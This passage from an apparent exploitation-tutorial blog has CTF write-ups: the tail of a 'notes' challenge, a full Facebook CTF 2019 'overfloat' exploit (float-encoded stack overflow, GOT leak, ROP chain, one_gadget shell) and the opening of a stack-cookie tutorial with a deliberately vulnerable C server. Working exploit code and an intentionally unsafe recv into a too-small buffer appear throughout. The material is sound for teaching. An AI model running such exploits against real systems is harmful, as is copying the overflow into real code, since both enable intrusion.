0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,A: File name too long notes.c notes </code></pre></div></div> <p>Now let’s try it remotely. Spawn the challenge with <code class="language-plaintext highlighter-rouge">socat</code> (<code class="language-plaintext highlighter-rouge">apt install socat</code>) at port <code class="language-plaintext highlighter-rouge">1337</code></p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>socat tcp-l:1337,reuseaddr,fork system:<span class="s2">"timeout 60 ./notes"</span> </code></pre></div></div> <p>and test the connection:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc localhost 1337 Who is next? AAAA ############# 1 - HELP 2 - Save note 3 - Edit note 4 - Show note 5 - Exit ############# </code></pre></div></div> <p>Modify the exploit and run it against the remote target. Note that if you have a different libc version on your system you would have to adjust the libc path to the remote one. Furthermore, you would have to change the one-shot gadget.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#r = process("./notes") </span><span class="n">r</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1337</span><span class="p">)</span> <span class="c1">#gdb.attach(r.pid,""" #""") </span><span class="p">...</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ python exploit.py [*] '/lib/x86_64-linux-gnu/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [+] Opening connection to localhost on port 1337: Done [*] puts @ 0x7f91453009c0 [*] libc base @ 0x7f9145280000 [*] __malloc_hook @ 0x7f914566bc30 [*] Switching to interactive mode Usage: &lt;position&gt;,&lt;new character&gt; &gt; notes notes.c $ id uid=1000(work) gid=1000(work) $ </code></pre></div></div> <hr /> <p>Yay! We got a shell and successfully bypassed <code class="language-plaintext highlighter-rouge">RelRO</code>! Interesting how such a small bug (signed integer and no negative value checks) can lead to full control over a remote system.<br /> Happy Hacking!</p>made0x78Hello everyone! Today we are going to bypass Full RelRO by using a relative write out-of-bounds vulnerability. Like last time, we have access to the binary (no libc provided) and we have to leak some information to identify the correct libc version. You can download the challenge along with the source code.Facebook CTF 2019: overfloat2019-06-03T00:00:00+00:002019-06-03T00:00:00+00:00https://made0x78.com/ctfs-fbctf19-overfloat<p><code class="language-plaintext highlighter-rouge">overfloat</code> was an entry challenge of the pwnable category of the Facebook CTF 2019. A binary and a libc were provided (<a href="/downloads/ctfs/2019/fbctf/overfloat.tar.gz">Original tar</a>). You can find the full exploit at the end of this post.</p> <p>The application itself is straightforward. You have a command-line input where you can specify a longitude and latitude.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./overfloat _ .--. ( ` ) .-' `--, _..----.. ( )`-. .'_|` _|` _|( .__, ) /_| _| _| _( (_, .-' ;| _| _| _| '-'__,--'`--' | _| _| _| _| | _ || _| _| _| _| _( `--.\_| _| _| _|/ .-' )--,| _| _|.` (__, (_ ) )_| _| / `-.__.\ _,--'\|__|__/ ;____; \YT/ || |""| '==' WHERE WOULD YOU LIKE TO GO? LAT[0]: 1 LON[0]: 1 LAT[1]: done BON VOYAGE! </code></pre></div></div> <p>You can even set multiple values …. and write out-of-bounds.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>... WHERE WOULD YOU LIKE TO GO? LAT[0]: 1 LON[0]: 1 LAT[1]: 1 LON[1]: 1 LAT[2]: 1 LON[2]: 1 LAT[3]: 1 LON[3]: 1 LAT[4]: 1 LON[4]: 1 LAT[5]: 1 LON[5]: 1 LAT[6]: 1 LON[6]: 1 LAT[7]: 1 LON[7]: 1 LAT[8]: 1 LON[8]: 1 LAT[9]: 1 LON[9]: 1 LAT[0]: 1 LON[0]: 1 LAT[1]: 1 LON[1]: 1 LAT[2]: 1 LON[2]: 1 LAT[3]: 1 LON[3]: 1 LAT[4]: 1 LON[4]: 11 LAT[5]: done BON VOYAGE! [1] 5978 segmentation fault ./overfloat </code></pre></div></div> <p>Run it again with <code class="language-plaintext highlighter-rouge">gdb</code>. Segfault!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Id 1, Name: "overfloat", stopped, reason: SIGSEGV </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x00007fffffffdff8│+0x0000: 0x3f8000003f800000 ← $rsp 0x00007fffffffe000│+0x0008: 0x3f8000003f800000 0x00007fffffffe008│+0x0010: 0x3f8000003f800000 0x00007fffffffe010│+0x0018: 0x3f8000003f800000 0x00007fffffffe018│+0x0020: 0x3f8000003f800000 0x00007fffffffe020│+0x0028: 0x3f8000003f800000 </code></pre></div></div> <p>Since the challenge is named <code class="language-plaintext highlighter-rouge">overfloat</code> we can guess that it has something to do with floats. If we look carefully we can see that <code class="language-plaintext highlighter-rouge">0x3f800000</code> represents the float <code class="language-plaintext highlighter-rouge">1.0</code>.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">27</span><span class="p">]:</span> <span class="kn">import</span> <span class="nn">binascii</span> <span class="n">In</span> <span class="p">[</span><span class="mi">28</span><span class="p">]:</span> <span class="n">binascii</span><span class="p">.</span><span class="n">hexlify</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'f'</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">))</span> <span class="n">Out</span><span class="p">[</span><span class="mi">28</span><span class="p">]:</span> <span class="s">'0000803f'</span> </code></pre></div></div> <p>That means, we can write arbitrary floating point numbers on the stack. Let’s try it!</p> <p>Convert a 4 byte array to a floating point …</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">byte_to_float</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">4</span><span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">error</span><span class="p">(</span><span class="s">"Length of data should be 4"</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'f'</span><span class="p">,</span> <span class="nb">bytes</span><span class="p">(</span><span class="n">data</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span> </code></pre></div></div> <p>… and overflow the array</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="s">"A"</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="c1"># trigger return to main # BOF at end of main -&gt; ret </span><span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"done"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>Segfault and we see a lot of A’s (0x41) :)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ x/20wx $rsp 0x7ffe9dcc6c78: 0x41414141 0x41414141 0x41414141 0x41414141 0x7ffe9dcc6c88: 0x41414141 0x41414141 0x41414141 0x41414141 0x7ffe9dcc6c98: 0x41414141 0x41414141 0x41414141 0x41414141 0x7ffe9dcc6ca8: 0x41414141 0x41414141 0x41414141 0x41414141 0x7ffe9dcc6cb8: 0x41414141 0x41414141 0x41414141 0x41414141 </code></pre></div></div> <p>Now, we have to find the offset to overwrite the saved return address. Because we are lazy we change our loop and just look for the right value.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"done"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb after segfault: 0x00007ffe151cbf08│+0x0000: 0x0f0f0f0f0e0e0e0e ← $rsp </code></pre></div></div> <p>Offset is <code class="language-plaintext highlighter-rouge">0xe</code>. The next step is to define a function for an 8-byte write (64-bit challenge).</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">write_8_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="n">data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:])</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> </code></pre></div></div> <p>Furthermore, we can leak the address of <code class="language-plaintext highlighter-rouge">puts</code> via the GOT and jump back to the beginning of the application to exploit the vulnerability a second time but we have more information about the environment (leak of libc base). Therefore, we need a gadget to call puts with the correct pointer. We use <code class="language-plaintext highlighter-rouge">ropper</code> to look for a suitable gadget.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ropper --console -f ./overfloat [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% (overfloat/ELF/x86_64)&gt; search pop rdi [INFO] Searching for gadgets: pop rdi [INFO] File: ./overfloat 0x0000000000400a83: pop rdi; ret; </code></pre></div></div> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Begin of ROP chain # gadget from ropper </span><span class="n">pop_rdi</span> <span class="o">=</span> <span class="mh">0x0000000000400a83</span> <span class="c1">#: pop rdi; ret; </span> <span class="c1"># ret to gadget </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">))</span> <span class="c1"># read GOT, first argument of puts </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">chal</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]))</span> <span class="c1"># call puts </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">chal</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]))</span> <span class="c1"># jump to beginning # next return after puts </span><span class="n">start</span> <span class="o">=</span> <span class="mh">0x400993</span> <span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">start</span><span class="p">))</span> <span class="c1"># End of ROP chain </span> <span class="c1"># trigger vulnerability </span><span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"done"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"VOYAGE!"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="c1"># empty line # receive leak via puts </span><span class="n">res</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">print</span><span class="p">(</span><span class="s">"puts @ "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">u64</span><span class="p">(</span><span class="n">res</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))))</span> <span class="n">puts_address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">res</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))</span> <span class="n">libc_base</span> <span class="o">=</span> <span class="n">puts_address</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span> <span class="k">print</span><span class="p">(</span><span class="s">"libc @ "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span> <span class="c1"># interact with the application again # from the beginning ;) # remove it for the next part </span><span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Waiting for debugger: Done puts @ 0x7f3064d58910 libc @ 0x7f3064ce7000 ... </code></pre></div></div> <p>After that, we can easily call a one-shot gadget</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//local libc # one_gadget /lib/x86_64-linux-gnu/libc.so.6 0x4484f execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x448a3 execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xe5456 execve("/bin/sh", rsp+0x60, environ) constraints: [rsp+0x60] == NULL // remote libc # one_gadget libc-2.27.so 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) constraints: rcx == NULL 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a38c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL </code></pre></div></div> <p>and get a shell.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> <span class="n">one_gagdet</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4484f</span> <span class="k">else</span><span class="p">:</span> <span class="n">one_gagdet</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4f2c5</span> <span class="c1"># exploit a second time </span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"LIKE TO GO?"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0xe</span><span class="p">):</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="c1"># one gadget </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">one_gagdet</span><span class="p">))</span> <span class="c1"># trigger vulnerability and spawn shell via one gadget </span><span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"done"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Waiting for debugger: Done puts @ 0x7fd6ced34910 libc @ 0x7fd6cecc3000 [*] Switching to interactive mode LAT[0]: LON[0]: LAT[1]: LON[1]: LAT[2]: LON[2]: LAT[3]: LON[3]: LAT[4]: LON[4]: LAT[5]: LON[5]: LAT[6]: LON[6]: LAT[7]: LON[7]: LAT[8]: BON VOYAGE! $ id uid=0(root) gid=0(root) groups=0(root) </code></pre></div></div> <p>Disable debug mode and get the flag. :)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Opening connection to challenges.fbctf.com on port 1341: Done puts @ 0x7f4d087519c0 libc @ 0x7f4d086d1000 [*] Switching to interactive mode LAT[0]: LON[0]: LAT[1]: LON[1]: LAT[2]: LON[2]: LAT[3]: LON[3]: LAT[4]: LON[4]: LAT[5]: LON[5]: LAT[6]: LON[6]: LAT[7]: LON[7]: LAT[8]: BON VOYAGE! $ cat /home/overfloat/flag fb{FloatsArePrettyEasy...} </code></pre></div></div> <p><b>Full (quick and dirty) exploit:<b></b></b></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="nn">binascii</span> <span class="n">chal</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./overfloat"</span><span class="p">)</span> <span class="n">debug</span> <span class="o">=</span> <span class="bp">False</span> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./overfloat"</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"/lib/x86_64-linux-gnu/libc.so.6"</span><span class="p">)</span> <span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="s">''' '''</span><span class="p">)</span> <span class="c1">#b*0x0000000000400a83 </span><span class="k">else</span><span class="p">:</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./libc-2.27.so"</span><span class="p">)</span> <span class="n">r</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"challenges.fbctf.com"</span><span class="p">,</span> <span class="mi">1341</span><span class="p">)</span> <span class="k">def</span> <span class="nf">byte_to_float</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">4</span><span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">error</span><span class="p">(</span><span class="s">"Length of data should be 4"</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="n">struct</span><span class="p">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">'f'</span><span class="p">,</span> <span class="nb">bytes</span><span class="p">(</span><span class="n">data</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"LIKE TO GO?"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0xe</span><span class="p">):</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="k">def</span> <span class="nf">write_8_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="n">data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:])</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="n">pop_rdi</span> <span class="o">=</span> <span class="mh">0x0000000000400a83</span> <span class="c1">#: pop rdi; ret; </span> <span class="c1"># ret </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">))</span> <span class="c1"># GOT </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">chal</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]))</span> <span class="c1"># call puts </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">chal</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]))</span> <span class="c1"># jump to beginning </span><span class="n">start</span> <span class="o">=</span> <span class="mh">0x400993</span> <span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">start</span><span class="p">))</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"done"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"VOYAGE!"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="c1"># empty line </span><span class="n">res</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">print</span><span class="p">(</span><span class="s">"puts @ "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">u64</span><span class="p">(</span><span class="n">res</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))))</span> <span class="n">puts_address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">res</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))</span> <span class="n">libc_base</span> <span class="o">=</span> <span class="n">puts_address</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span> <span class="k">print</span><span class="p">(</span><span class="s">"libc @ "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> <span class="n">one_gagdet</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4484f</span> <span class="k">else</span><span class="p">:</span> <span class="n">one_gagdet</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4f2c5</span> <span class="c1"># exploit a second time </span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"LIKE TO GO?"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0xe</span><span class="p">):</span> <span class="n">tosend</span> <span class="o">=</span> <span class="n">byte_to_float</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">tosend</span><span class="p">)</span> <span class="c1"># one gadget </span><span class="n">write_8_bytes</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">one_gagdet</span><span class="p">))</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"done"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p><br /></p> <hr /> <p>This was a good beginner challenge and the first time I used floating points to write my payload.</p> <p>Happy Hacking!</p>made0x78overfloat was an entry challenge of the pwnable category of the Facebook CTF 2019. A binary and a libc were provided (Original tar). You can find the full exploit at the end of this post.Binary Exploitation Series (6): Defeating Stack Cookies2019-03-15T00:00:00+00:002019-03-15T00:00:00+00:00https://made0x78.com/bseries-defeat-stack-cookies<p>Today we are going to defeat stack cookies in two different ways. We have access to the binary and we need to leak some information about its environment to write our exploit. As always, you can download the <a href="/downloads/bseries/chapter_6/cookies">challenge</a>.<br /> This time we have stack cookies (<code class="language-plaintext highlighter-rouge">Canary: Yes</code>) enabled.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ checksec [+] checksec for './cookies' Canary : Yes → value: 0xf28cd8655c310f00 NX : Yes PIE : No Fortify : No RelRO : Partial ASLR is activated ;-) </code></pre></div></div> <h2 id="stack-cookie-protection">Stack Cookie Protection</h2> <p>We’ll start by understanding what a stack cookie/canary is and what it protects. In general, a stack cookie is a randomly chosen value (4 or 8 bytes long) which is always put before the saved base pointer on the stack. Before a function returns the stack cookie will always be checked for correctness. If it is modified a program will just crash and a possible malicious code won’t be executed. This gives us a certain amount of security if a stack buffer overflow occurs because it protects us against control over the return address of the program. But there are multiple problems with stack cookies.<br /> The first problem is that we can still overflow all variables which are between our buffer and the stack cookie. Second, if the program <a href="http://man7.org/linux/man-pages/man2/fork.2.html">forks</a> it is possible to leak the stack cookie because it has the same value in each child process. Third problem, if the target does not have a classic buffer overflow e.g. a format string vulnerability or a relative write out of bounds via an array, we could still bypass the stack cookie and write directly to certain addresses. So, stack cookies are somewhat good protection against non-forked programs with stack buffer overflow vulnerabilities but for other scenarios, this protection is easy to bypass.<br /> Note, that stack cookies always have a null byte as the least significant byte because some functions will stop reading data if a null byte is sent. Therefore, an attacker would not be able to brute force or even send a stack cookie, if it is known, because the function would stop reading at the null byte. <br /> <img src="/assets/images/bseries_ch6_stackcookie.jpg" width="500" /> <br /></p> <h2 id="target">Target</h2> <p>The target is again very simple. We have a basic socket server that can handle multiple connections and therefore spawns child processes (fork) for each request. The vulnerability is in the function <code class="language-plaintext highlighter-rouge">serve</code> by reading 2048 bytes into a 1024 buffer.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;netdb.h&gt; #include &lt;netinet/in.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #include &lt;netinet/tcp.h&gt; </span> <span class="c1">//gcc -m64 cookies.c -o cookies -no-pie</span> <span class="kt">void</span> <span class="nf">serve</span><span class="p">(</span><span class="kt">int</span> <span class="n">sock</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span> <span class="c1">// recv data</span> <span class="n">recv</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="mi">2048</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// send the message back</span> <span class="n">send</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">buffer</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">sockfd</span><span class="p">,</span> <span class="n">newsockfd</span><span class="p">,</span> <span class="n">portno</span><span class="p">,</span> <span class="n">clilen</span><span class="p">;</span> <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">serv_addr</span><span class="p">,</span> <span class="n">cli_addr</span><span class="p">;</span> <span class="kt">int</span> <span class="n">n</span><span class="p">,</span> <span class="n">pid</span><span class="p">;</span> <span class="n">sockfd</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">sockfd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">perror</span><span class="p">(</span><span class="s">"ERROR opening socket"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">bzero</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">serv_addr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">serv_addr</span><span class="p">));</span> <span class="n">portno</span> <span 